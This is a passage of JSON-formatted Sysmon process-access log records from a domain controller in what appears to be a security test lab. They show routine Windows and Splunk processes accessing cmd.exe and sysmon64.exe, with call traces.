{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1627,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.719\r\nSourceProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nSourceProcessId: 3088\r\nSourceThreadId: 3092\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-01C6-5F25-0000-001042600300}\r\nTargetProcessId: 3708\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+f2b15|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.719","SourceProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","SourceProcessId":"3088","SourceThreadId":"3092","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-01C6-5F25-0000-001042600300}","TargetProcessId":"3708","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+f2b15|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1628,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.719\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C6-5F25-0000-001042600300}\r\nTargetProcessId: 3708\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.719","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C6-5F25-0000-001042600300}","TargetProcessId":"3708","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1629,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.719\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.719","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1630,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.719\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.719","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1631,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.719\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.719","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1632,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.719\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.719","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1633,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.719\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.719","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1634,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.719\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.719","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1635,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.719\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 